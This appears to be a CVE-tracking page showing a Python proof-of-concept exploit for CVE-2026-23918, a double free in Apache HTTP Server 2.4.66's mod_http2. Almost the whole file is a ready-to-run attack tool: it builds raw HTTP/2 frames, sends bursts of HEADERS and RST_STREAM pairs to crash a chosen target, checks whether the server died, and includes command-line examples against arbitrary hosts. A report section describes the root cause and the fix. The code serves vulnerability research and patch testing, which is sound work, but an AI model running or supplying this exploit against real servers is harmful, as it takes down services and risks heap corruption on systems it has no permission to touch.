5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-23918 PoC - Apache HTTP Server mod_http2 Double Free (Early Reset)
===========================================================================
VULNERABILITY: Double Free in Apache HTTP Server 2.4.66 when mod_http2
handles early RST_STREAM frames. The bug is in h2_mplx.c where
`m_stream_cleanup()` can add a stream to `m->spurge` array twice when
an RST_STREAM arrives before the worker thread starts processing.

AFFECTED:  Apache HTTP Server 2.4.66 with mod_http2 + Event MPM
FIXED IN:  2.4.67 (mod_h2 v2.0.37: "Prevent double purge of a stream")
CVSS 3.1:  8.8 (HIGH) - Unauthenticated Remote Code Execution possible
CWE:       CWE-415 (Double Free)
SVN FIXES: r1930444, r1930796

TRIGGER: Client sends HEADERS frame followed IMMEDIATELY by RST_STREAM
on the same stream ID. If the timing hits the window where the stream
is registered but processing hasn't started, `m_stream_cleanup()` adds
the stream to `m->spurge` (the purge array). Without the deduplication
check (`add_for_purge()` added in v2.0.37), the same stream can be
added again during mplx/connection cleanup → double pool destruction
→ double free → heap corruption.

DISCLAIMER: For authorized security testing and research only.
This tool requires explicit permission to test against any target.
"""

from __future__ import annotations

import argparse
import json
import os
import socket
import ssl
import struct
import sys
import textwrap
import time
from dataclasses import dataclass
from enum import Enum
from typing import Optional, List, Tuple

# Use hpack for proper HPACK encoding
try:
    from hpack import Encoder as HpackEncoder
    HAS_HPACK = True
except ImportError:
    HAS_HPACK = False

# Use requests for HTTP/1.1 version probing
try:
    import requests
    HAS_REQUESTS = True
except ImportError:
    HAS_REQUESTS = False

# ─── Constants ───────────────────────────────────────────────────────
H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"

# Frame types (RFC 7540 §4.1)
FRAME_DATA          = 0x0
FRAME_HEADERS       = 0x1
FRAME_PRIORITY      = 0x2
FRAME_RST_STREAM    = 0x3
FRAME_SETTINGS      = 0x4
FRAME_PUSH_PROMISE  = 0x5
FRAME_PING          = 0x6
FRAME_GOAWAY        = 0x7
FRAME_WINDOW_UPDATE = 0x8
FRAME_CONTINUATION  = 0x9

# Frame flags
FLAG_ACK         = 0x1
FLAG_END_STREAM  = 0x1
FLAG_END_HEADERS = 0x4

# RST_STREAM error codes
ERR_NO_ERROR       = 0x0
ERR_PROTOCOL_ERROR = 0x1
ERR_INTERNAL_ERROR = 0x2
ERR_CANCEL         = 0x8
ERR_REFUSED_STREAM = 0x7


# ─── Frame Builder ───────────────────────────────────────────────────
@dataclass
class Frame:
    """HTTP/2 frame representation."""
    type_: int
    flags: int
    stream_id: int
    payload: bytes = b""

    def serialize(self) -> bytes:
        """Serialize frame to wire format: 9-byte header + payload."""
        length = len(self.payload)
        header = (
            struct.pack("!I", length)[1:]         # 3 bytes: length (big-endian 24-bit)
            + bytes([self.type_])                  # 1 byte: type
            + bytes([self.flags])                  # 1 byte: flags
            + struct.pack("!I", self.stream_id & 0x7FFFFFFF)  # 4 bytes: stream ID
        )
        return header + self.payload


def build_settings_frame(ack: bool = False) -> Frame:
    return Frame(
        type_=FRAME_SETTINGS,
        flags=FLAG_ACK if ack else 0,
        stream_id=0,
        payload=b"",
    )


def build_headers_frame(stream_id: int, headers: List[Tuple[str, str]],
                         end_stream: bool = False,
                         end_headers: bool = True,
                         encoder: Optional[HpackEncoder] = None) -> Frame:
    """Build HEADERS frame with proper HPACK encoding."""
    if encoder is None:
        encoder = HpackEncoder()
    payload = encoder.encode(headers)
    flags = 0
    if end_stream:
        flags |= FLAG_END_STREAM
    if end_headers:
        flags |= FLAG_END_HEADERS
    return Frame(
        type_=FRAME_HEADERS,
        flags=flags,
        stream_id=stream_id,
        payload=payload,
    )


def build_rst_stream_frame(stream_id: int, error_code: int = ERR_CANCEL) -> Frame:
    return Frame(
        type_=FRAME_RST_STREAM,
        flags=0,
        stream_id=stream_id,
        payload=struct.pack("!I", error_code),
    )


def build_window_update(stream_id: int, increment: int = 65535) -> Frame:
    return Frame(
        type_=FRAME_WINDOW_UPDATE,
        flags=0,
        stream_id=stream_id,
        payload=struct.pack("!I", increment & 0x7FFFFFFF),
    )


def build_ping_frame(data: bytes = b"\x00" * 8, ack: bool = False) -> Frame:
    return Frame(
        type_=FRAME_PING,
        flags=FLAG_ACK if ack else 0,
        stream_id=0,
        payload=data,
    )


def build_goaway_frame(last_stream_id: int = 0,
                        error_code: int = ERR_NO_ERROR) -> Frame:
    return Frame(
        type_=FRAME_GOAWAY,
        flags=0,
        stream_id=0,
        payload=struct.pack("!II", last_stream_id & 0x7FFFFFFF, error_code),
    )


# ─── Raw H2 Connection ───────────────────────────────────────────────
class H2Connection:
    """
    Low-level HTTP/2 connection handler.
    Uses raw frame construction for precise control over frame ordering
    and timing - essential for race condition exploitation.
    """

    def __init__(self, host: str, port: int, use_tls: bool = True,
                 timeout: float = 10.0):
        self.host = host
        self.port = port
        self.use_tls = use_tls
        self.timeout = timeout
        self.sock: Optional[socket.socket] = None
        self._encoder = HpackEncoder() if HAS_HPACK else None
        self._headers = [
            (":method", "GET"),
            (":path", "/"),
            (":scheme", "https"),
            (":authority", host),
        ]
        self._next_stream_id = 1

    # ── Connection management ──────────────────────────────────────

    def connect(self) -> bool:
        """Establish TCP + TLS connection with ALPN h2 negotiation."""
        try:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.settimeout(self.timeout)
            self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
            self.sock.connect((self.host, self.port))

            if self.use_tls:
                ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE
                ctx.set_alpn_protocols(["h2"])
                ctx.minimum_version = ssl.TLSVersion.TLSv1_2

                self.sock = ctx.wrap_socket(self.sock, server_hostname=self.host)
                negotiated = self.sock.selected_alpn_protocol()
                if negotiated != "h2":
                    raise RuntimeError(
                        f"ALPN negotiation failed: got '{negotiated}'")

            return self._handshake()
        except Exception as e:
            return False

    def _handshake(self) -> bool:
        """Send preface + SETTINGS, await server SETTINGS, ACK."""
        try:
            # Connection preface
            self._send_raw(H2_PREFACE)

            # Client SETTINGS (empty)
            self._send_frame(build_settings_frame(ack=False))

            # Read server SETTINGS
            self.sock.settimeout(5.0)
            frame = self._recv_frame()
            self.sock.settimeout(self.timeout)

            if frame is None:
                return False

            # Expect SETTINGS from server
            if frame.type_ == FRAME_SETTINGS:
                if not (frame.flags & FLAG_ACK):
                    # ACK server settings
                    self._send_frame(build_settings_frame(ack=True))
                    # Drain any WINDOW_UPDATE on stream 0
                    self._drain()
                    return True
            elif frame.type_ == FRAME_GOAWAY:
                return False

            return True
        except Exception:
            return False

    # ── Frame I/O ─────────────────────────────────────────────────

    def _send_frame(self, frame: Frame) -> bool:
        """Send a single HTTP/2 frame."""
        try:
            self.sock.sendall(frame.serialize())
            return True
        except Exception:
            return False

    def _send_raw(self, data: bytes) -> bool:
        """Send raw bytes."""
        try:
            self.sock.sendall(data)
            return True
        except Exception:
            return False

    def _recv_exact(self, n: int) -> Optional[bytes]:
        """Receive exactly n bytes or None on failure."""
        try:
            buf = b""
            while len(buf) < n:
                chunk = self.sock.recv(n - len(buf))
                if not chunk:
                    return None
                buf += chunk
            return buf
        except Exception:
            return None

    def _recv_frame(self) -> Optional[Frame]:
        """Receive a single HTTP/2 frame."""
        hdr = self._recv_exact(9)
        if hdr is None:
            return None
        length = int.from_bytes(hdr[:3], "big")
        frame_type = hdr[3]
        flags = hdr[4]
        stream_id = struct.unpack("!I", hdr[5:9])[0] & 0x7FFFFFFF
        payload = b""
        if length > 0:
            payload = self._recv_exact(length)
            if payload is None:
                return None
        return Frame(type_=frame_type, flags=flags,
                     stream_id=stream_id, payload=payload)

    def _drain(self, timeout: float = 0.3):
        """Drain socket buffer."""
        try:
            self.sock.settimeout(timeout)
            while True:
                chunk = self.sock.recv(65536)
                if not chunk:
                    break
        except socket.timeout:
            pass
        except Exception:
            pass
        finally:
            self.sock.settimeout(self.timeout)

    # ── Exploit operations ────────────────────────────────────────

    def send_exploit_stream(self, stream_id: int) -> bool:
        """
        Send HEADERS frame immediately followed by RST_STREAM.
        Combined into one send() call to maximize chance of them
        arriving in the same TCP segment / processing window.
        """
        hdr = build_headers_frame(
            stream_id, self._headers,
            end_stream=False, encoder=self._encoder,
        )
        rst = build_rst_stream_frame(stream_id, ERR_CANCEL)
        return self._send_raw(hdr.serialize() + rst.serialize())

    def send_exploit_burst(self, count: int,
                            start_stream_id: int = 1) -> int:
        """
        Send a burst of HEADERS+RST_STREAM pairs.
        Pre-serializes all frames for maximum throughput.
        Returns number of pairs successfully sent.
        """
        # Pre-build all frame pairs
        payloads = []
        for i in range(count):
            sid = start_stream_id + (i * 2)
            hdr = build_headers_frame(
                sid, self._headers,
                end_stream=False, encoder=self._encoder,
            )
            rst = build_rst_stream_frame(sid, ERR_CANCEL)
            payloads.append(hdr.serialize() + rst.serialize())

        # Fire all bursts as fast as possible
        sent = 0
        for payload in payloads:
            if not self._send_raw(payload):
                break
            sent += 1

        # Keep connection flow control window open
        wu = build_window_update(0, 65535 * count)
        self._send_frame(wu)

        return sent

    def send_raw_exploit_burst(self, count: int,
                                start_stream_id: int = 1) -> int:
        """
        Alternative burst: send HEADERS to many streams first,
        THEN send RST_STREAM to all of them. This changes the timing
        profile and may be more effective at hitting the race window.
        """
        streams = list(range(start_stream_id, start_stream_id + count * 2, 2))
        sent = 0

        # Phase 1: Open many streams
        for sid in streams:
            hdr = build_headers_frame(
                sid, self._headers,
                end_stream=False, encoder=self._encoder,
            )
            if not self._send_frame(hdr):
                return sent
            sent += 1

        # Phase 2: Reset all streams immediately
        for sid in streams:
            rst = build_rst_stream_frame(sid, ERR_CANCEL)
            self._send_frame(rst)

        return sent

    def ping(self) -> bool:
        """Send PING and check for PING ACK (health check)."""
        pdata = os.urandom(8)
        frame = build_ping_frame(pdata, ack=False)
        if not self._send_frame(frame):
            return False
        try:
            self.sock.settimeout(3.0)
            resp = self._recv_frame()
            self.sock.settimeout(self.timeout)
            if resp and resp.type_ == FRAME_PING and (resp.flags & FLAG_ACK):
                return resp.payload == pdata
        except Exception:
            self.sock.settimeout(self.timeout)
        return False

    def close(self):
        """Graceful connection close."""
        if self.sock:
            try:
                self._send_frame(build_goaway_frame())
            except Exception:
                pass
            try:
                self.sock.close()
            except Exception:
                pass


# ─── Port Health Check ───────────────────────────────────────────────
def port_alive(host: str, port: int, timeout: float = 3.0) -> bool:
    """Test if TCP port accepts connections."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((host, port))
        s.close()
        return True
    except Exception:
        return False


# ─── Version Detection ───────────────────────────────────────────────
def detect_version(host: str, port: int, use_tls: bool = True,
                   timeout: float = 5.0) -> dict:
    """Detect Apache version via HTTP/1.1 request."""
    info = {"version": "unknown", "server": "unknown", "http2_support": False}

    if not HAS_REQUESTS:
        return info

    scheme = "https" if use_tls else "http"
    try:
        r = requests.get(
            f"{scheme}://{host}:{port}/",
            timeout=timeout,
            verify=False,
            headers={"User-Agent": "Mozilla/5.0"},
        )
        info["server"] = r.headers.get("Server", "unknown")
        import re
        m = re.search(r"Apache/([\d.]+)", info["server"])
        if m:
            info["version"] = m.group(1)

        # Check for HTTP/2 via upgrade header in response
        # (not 100% reliable for direct h2, but indicates awareness)
        if "h2" in r.headers.get("Upgrade", ""):
            info["http2_support"] = True
    except Exception:
        pass

    # Try ALPN to detect h2 support
    if use_tls:
        try:
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            ctx.set_alpn_protocols(["h2", "http/1.1"])

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            s.connect((host, port))
            ss = ctx.wrap_socket(s, server_hostname=host)
            negotiated = ss.selected_alpn_protocol()
            ss.close()
            if negotiated == "h2":
                info["http2_support"] = True
        except Exception:
            pass

    return info


# ─── Main Exploit Class ──────────────────────────────────────────────
class CVE202623918:
    """
    CVE-2026-23918 Exploit for Apache HTTP Server mod_http2 Double Free.

    ROOT CAUSE:
    In Apache 2.4.66 (mod_h2 v2.0.33-v2.0.36), when an RST_STREAM arrives
    before the stream's request is picked up by a worker thread (Event MPM),
    h2_mplx.c:m_stream_cleanup() adds the stream to m->spurge (the purge
    array). Since there was no deduplication check, the same stream could
    be pushed again during connection/mplx teardown.

    In v2.0.37, add_for_purge() was added to check if the stream is already
    scheduled for purging, preventing the double free.

    The v2.0.36 quick fix reverted streams' own memory allocators (from
    v2.0.33), which masked the issue because APR pool cleanup functions
    are idempotent when pools share allocators. But the root cause
    (double push to spurge) remained until v2.0.37.

    EXPLOIT MECHANICS:
    1. Establish HTTP/2 connection (TLS + ALPN h2)
    2. Send HEADERS frame to open a new stream
    3. Immediately send RST_STREAM (CANCEL) on same stream
    4. Repeat rapidly across many streams
    5. Race condition: if RST_STREAM arrives during the narrow window
       between stream registration and worker pickup, dual code paths
       may both add the stream to the purge array
    6. When the mplx is destroyed, the stream pool is freed twice
       → double free → glibc heap corruption → SIGABRT/SIGSEGV
    """

    def __init__(self, target: str, port: int = 443,
                 use_tls: bool = True, timeout: float = 10.0,
                 verbose: bool = False):
        self.target = target
        self.port = port
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose
        self._crashed = False

    def _log(self, msg: str, tag: str = "*"):
        tags = {"*": "[*]", "+": "[+]", "-": "[-]", "!": "[!]"}
        prefix = tags.get(tag, "[*]")
        ts = time.strftime("%H:%M:%S")
        print(f"{prefix} [{ts}] {msg}")

    def check(self) -> dict:
        """Pre-exploit reconnaissance."""
        info = detect_version(self.target, self.port, self.use_tls, self.timeout)
        vulnerable = False
        reason = "Unknown"

        if info["version"] == "2.4.66":
            if info["http2_support"]:
                vulnerable = True
                reason = "Apache 2.4.66 with HTTP/2 support - VULNERABLE"
            else:
                reason = "Apache 2.4.66 but HTTP/2 not detected - may need h2 ALPN"
        elif info["version"] and info["version"] < "2.4.66":
            reason = f"Apache {info['version']} < 2.4.66 - not affected"
        elif info["version"] and info["version"] >= "2.4.67":
            reason = f"Apache {info['version']} >= 2.4.67 - likely patched"
        elif info["version"] == "unknown":
            reason = "Version unknown - proceed with caution"

        return {
            "version": info["version"],
            "server": info["server"],
            "http2_support": info["http2_support"],
            "vulnerable": vulnerable,
            "reason": reason,
        }

    def _run_burst(self, burst_size: int, conn_id: int = 0,
                    mode: str = "inline") -> Tuple[int, bool]:
        """
        Single connection exploit burst.
        Returns (streams_sent, crashed).
        """
        conn = H2Connection(
            self.target, self.port,
            use_tls=self.use_tls, timeout=self.timeout,
        )

        if not conn.connect():
            self._log(f"Conn#{conn_id}: Connection failed", "-")
            return 0, False

        if mode == "inline":
            # Both frames in one send() call
            sent = conn.send_exploit_burst(burst_size)
        elif mode == "staged":
            # Open all, then reset all
            sent = conn.send_raw_exploit_burst(burst_size)
        else:
            sent = 0

        self._log(
            f"Conn#{conn_id}: Sent {sent}/{burst_size} HEADERS+RST pairs",
            "+" if sent > 0 else "-",
        )

        crashed = False
        if sent > 0:
            alive = conn.ping()
            if not alive:
                crashed = True
                self._log(f"Conn#{conn_id}: PING failed - server likely crashed!", "+")
            else:
                self._log(f"Conn#{conn_id}: Server alive (PING OK)", tag="*" if self.verbose else "")
        conn.close()
        return sent, crashed

    def execute(self, iterations: int = 10, burst_size: int = 200,
               delay: float = 0.3, mode: str = "inline") -> dict:
        """
        Execute the full exploit.

        Args:
            iterations: Number of exploit rounds
            burst_size: HEADERS+RST_STREAM pairs per round
            delay: Seconds between rounds
            mode: 'inline' (HEADERS+RST in one send) or 'staged' (all headers then all RSTs)
        """
        # Pre-check
        check = self.check()
        self._log(f"Target: {self.target}:{self.port}")
        self._log(f"Version: {check['version']} | Server: {check['server']}")
        self._log(f"HTTP/2: {'Yes' if check['http2_support'] else 'No/Unknown'}")
        self._log(f"Assessment: {check['reason']}")

        print()

        total_sent = 0
        crashes = 0
        round_log = []

        for i in range(iterations):
            if self._crashed:
                self._log("Crash already confirmed - stopping further iterations", "!")
                break

            # Pre-iteration health check
            if i > 0 and not port_alive(self.target, self.port, 2.0):
                self._log("Port is DOWN - crash CONFIRMED!", "+")
                crashes += 1
                self._crashed = True
                break

            self._log(f"Round {i+1}/{iterations} [{mode} mode, burst={burst_size}]")

            sent, crashed = self._run_burst(burst_size, conn_id=i, mode=mode)
            total_sent += sent
            if crashed:
                crashes += 1
                self._crashed = True

            round_log.append({
                "round": i + 1,
                "streams_sent": sent,
                "crashed": crashed,
            })

            if not self._crashed and i < iterations - 1:
                time.sleep(delay)

        # Phase 2: Try the alternative mode if first didn't crash
        if not self._crashed and mode == "inline":
            self._log("Phase 2: Trying staged mode (burst first, then reset)...")
            for i in range(iterations // 2):
                if self._crashed:
                    break
                if i > 0 and not port_alive(self.target, self.port, 2.0):
                    self._crashed = True
                    crashes += 1
                    break
                self._log(f"  Staged round {i+1}/{iterations//2}")
                sent, crashed = self._run_burst(burst_size, conn_id=100 + i, mode="staged")
                total_sent += sent
                if crashed:
                    crashes += 1
                    self._crashed = True
                if not self._crashed:
                    time.sleep(delay)
        elif not self._crashed and mode == "staged":
            self._log("Phase 2: Trying inline mode (HEADERS+RST in one send)...")
            for i in range(iterations // 2):
                if self._crashed:
                    break
                if i > 0 and not port_alive(self.target, self.port, 2.0):
                    self._crashed = True
                    crashes += 1
                    break
                self._log(f"  Inline round {i+1}/{iterations//2}")
                sent, crashed = self._run_burst(burst_size, conn_id=200 + i, mode="inline")
                total_sent += sent
                if crashed:
                    crashes += 1
                    self._crashed = True
                if not self._crashed:
                    time.sleep(delay)

        # Final health check
        final_alive = port_alive(self.target, self.port, 3.0)

        result = {
            "target": f"{self.target}:{self.port}",
            "version": check["version"],
            "server": check["server"],
            "http2_support": check["http2_support"],
            "vulnerable": check["vulnerable"],
            "iterations": iterations,
            "burst_size": burst_size,
            "mode": mode,
            "total_streams_sent": total_sent,
            "crashes": crashes,
            "crash_confirmed": self._crashed,
            "port_alive": final_alive,
            "rounds": round_log,
        }

        # Summary
        print()
        self._log("=" * 60)
        if self._crashed:
            self._log("CRASH CONFIRMED - Target is VULNERABLE to CVE-2026-23918", "+")
        else:
            self._log("No crash detected", "-")
            self._log("Possible reasons:", "!")
            self._log("  - Target is not Apache 2.4.66", "!")
            self._log("  - HTTP/2 not enabled (mod_http2)", "!")
            self._log("  - Event MPM not in use", "!")
            self._log("  - Target already patched (2.4.67+)", "!")
            self._log("  - Need more iterations or larger burst", "!")
        self._log(f"Total streams sent: {total_sent}")
        self._log(f"Port status: {'ALIVE' if final_alive else 'DEAD/UNREACHABLE'}")
        self._log("=" * 60)

        return result


# ─── Report Generator ────────────────────────────────────────────────
def generate_report(result: dict, filepath: str):
    """Generate detailed Markdown exploit report."""
    r = result
    lines = [
        f"# CVE-2026-23918 Exploit Report",
        f"",
        f"| Field | Value |",
        f"|-------|-------|",
        f"| **Target** | `{r['target']}` |",
        f"| **Date** | {time.strftime('%Y-%m-%d %H:%M:%S')} |",
        f"| **Apache Version** | {r['version']} |",
        f"| **Server Header** | `{r['server']}` |",
        f"| **HTTP/2 Support** | {'Yes' if r['http2_support'] else 'No/Unknown'} |",
        f"| **Pre-assessed** | {'Vulnerable' if r['vulnerable'] else 'Unknown/Not'} |",
        f"",
        f"## Exploit Parameters",
        f"",
        f"| Parameter | Value |",
        f"|-----------|-------|",
        f"| Iterations | {r['iterations']} |",
        f"| Burst size | {r['burst_size']} |",
        f"| Attack mode | {r['mode']} |",
        f"| Total streams sent | {r['total_streams_sent']} |",
        f"| Crashes detected | {r['crashes']} |",
        f"| Crash confirmed | **{'YES' if r['crash_confirmed'] else 'NO'}** |",
        f"| Port alive (final) | {'Yes' if r['port_alive'] else 'No'} |",
        f"",
        f"## Technical Background",
        f"",
        f"CVE-2026-23918 is a **double-free vulnerability** (CWE-415) in ",
        f"Apache HTTP Server's `mod_http2` module.",
        f"",
        f"### Affected Code Path",
        f"",
        f"The bug resides in `modules/http2/h2_mplx.c`:",
        f"",
        f"```c",
        f"static void m_stream_cleanup(h2_mplx *m, h2_stream *stream)",
        f"{{",
        f"    // ... various checks ...",
        f"",
        f"    // Case: stream was submitted but not yet started",
        f"    // (early RST_STREAM before worker picked it up)",
        f"    else {{",
        f"        /* never started */",
        f"        APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;  // FIRST PUSH",
        f"    }}",
        f"}}",
        f"```",
        f"",
        f"Later, during `h2_mplx_destroy()` or connection cleanup, ",
        f"another code path may also push the same stream to `m->spurge`:",
        f"",
        f"```c",
        f"static void c1c2_stream_joined(h2_mplx *m, h2_stream *stream)",
        f"{{",
        f"    // ... ",
        f"    APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;  // SECOND PUSH!",
        f"}}",
        f"```",
        f"",
        f"Without deduplication, both pushes reference the same stream pool.",
        f"When `h2_mplx_destroy()` iterates `m->spurge`, it destroys the ",
        f"pool **twice** → double free → heap corruption.",
        f"",
        f"### The Fix (mod_h2 v2.0.37 / Apache 2.4.67)",
        f"",
        f"```c",
        f"static int add_for_purge(h2_mplx *m, h2_stream *stream)",
        f"{{",
        f"    int i;",
        f"    for (i = 0; i < m->spurge->nelts; ++i) {{",
        f"        h2_stream *s = APR_ARRAY_IDX(m->spurge, i, h2_stream*);",
        f"        if (s == stream) /* already scheduled for purging */",
        f"            return FALSE;",
        f"    }}",
        f"    APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;",
        f"    return TRUE;",
        f"}}",
        f"```",
    ]

    if r["crash_confirmed"]:
        lines.extend([
            f"",
            f"## Conclusion",
            f"",
            f"**The target IS VULNERABLE to CVE-2026-23918.**",
            f"",
            f"### Recommended Actions",
            f"",
            f"1. **Immediate:** Upgrade Apache HTTP Server to **2.4.67+**",
            f"2. **Workaround:** Remove `h2` from the `Protocols` directive in httpd.conf",
            f"3. **Alternative:** Apply the mod_h2 v2.0.37 backport (cPanel EA-13319)",
            f"4. **Detection:** Monitor for repeated Apache child process crashes",
            f"   in error.log with mod_http2 stack traces",
        ])
    else:
        lines.extend([
            f"",
            f"## Conclusion",
            f"",
            f"Crash was NOT confirmed in this test run.",
            f"",
            f"### Possible Reasons:",
            f"- Target is not Apache 2.4.66 or already patched to 2.4.67+",
            f"- mod_http2 not loaded or HTTP/2 disabled via configuration",
            f"- Event MPM not in use (race condition requires thread/process scheduling gap)",
            f"- Network conditions prevented hitting the race window",
            f"",
            f"### Suggestions:",
            f"- Increase iterations (`-n 50`) and burst size (`-b 1000`)",
            f"- Try both `--mode inline` and `--mode staged`",
            f"- Verify the target with `curl --http2 -k https://target/`",
        ])

    with open(filepath, "w", encoding="utf-8") as f:
        f.write("\n".join(lines))


# ─── CLI ─────────────────────────────────────────────────────────────
def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-23918 PoC - Apache HTTP/2 Double Free",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent("""\
            Examples:
              %(prog)s -t 192.168.1.100 -p 443
              %(prog)s -t example.com -p 443 -n 20 -b 500
              %(prog)s -t example.com --mode staged -n 10
              %(prog)s -t 10.0.0.1 --no-tls -p 80
              %(prog)s -t target.com --check-only
              %(prog)s -t target.com -o results.json --report exploit_report.md
        """),
    )

    parser.add_argument("-t", "--target", required=True,
                        help="Target hostname or IP address")
    parser.add_argument("-p", "--port", type=int, default=443,
                        help="Target port (default: 443)")
    parser.add_argument("--no-tls", action="store_true",
                        help="Use cleartext h2c instead of TLS h2")
    parser.add_argument("-n", "--iterations", type=int, default=10,
                        help="Number of exploit iterations (default: 10)")
    parser.add_argument("-b", "--burst", type=int, default=200,
                        help="HEADERS+RST pairs per iteration (default: 200)")
    parser.add_argument("-d", "--delay", type=float, default=0.3,
                        help="Delay between iterations in seconds (default: 0.3)")
    parser.add_argument("-m", "--mode", choices=["inline", "staged"],
                        default="inline",
                        help="Attack mode: inline (default) sends HEADERS+RST together; "
                             "staged opens all streams then resets all")
    parser.add_argument("--timeout", type=float, default=10.0,
                        help="Connection timeout (default: 10)")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Verbose output")
    parser.add_argument("--check-only", action="store_true",
                        help="Only check version, don't exploit")
    parser.add_argument("-o", "--output",
                        help="Save results to JSON file")
    parser.add_argument("--report",
                        help="Generate detailed markdown report to file")

    args = parser.parse_args()

    use_tls = not args.no_tls
    if args.port == 80:
        use_tls = False

    if not HAS_REQUESTS:
        print("[!] 'requests' library not available - version detection limited")
        print("[!] Install: pip install requests")

    if not HAS_HPACK:
        print("[!] 'hpack' library not available - HPACK encoding may fail")
        print("[!] Install: pip install hpack")

    exploit = CVE202623918(
        target=args.target,
        port=args.port,
        use_tls=use_tls,
        timeout=args.timeout,
        verbose=args.verbose,
    )

    if args.check_only:
        info = exploit.check()
        print(f"\n  Target:    {args.target}:{args.port}")
        print(f"  Version:   {info['version']}")
        print(f"  Server:    {info['server']}")
        print(f"  HTTP/2:    {'Yes' if info['http2_support'] else 'No/Unknown'}")
        print(f"  Status:    {'VULNERABLE' if info['vulnerable'] else 'NOT VULNERABLE / UNKNOWN'}")
        print(f"  Reason:    {info['reason']}")
        return 0 if not info["vulnerable"] else 1

    result = exploit.execute(
        iterations=args.iterations,
        burst_size=args.burst,
        delay=args.delay,
        mode=args.mode,
    )

    if args.output:
        with open(args.output, "w", encoding="utf-8") as f:
            json.dump(result, f, indent=2, default=str)
        print(f"\n[+] JSON results saved to {args.output}")

    if args.report:
        generate_report(result, args.report)
        print(f"[+] Markdown report saved to {args.report}")

    return 0 if not result["crash_confirmed"] else 1


if __name__ == "__main__":
    sys.exit(main())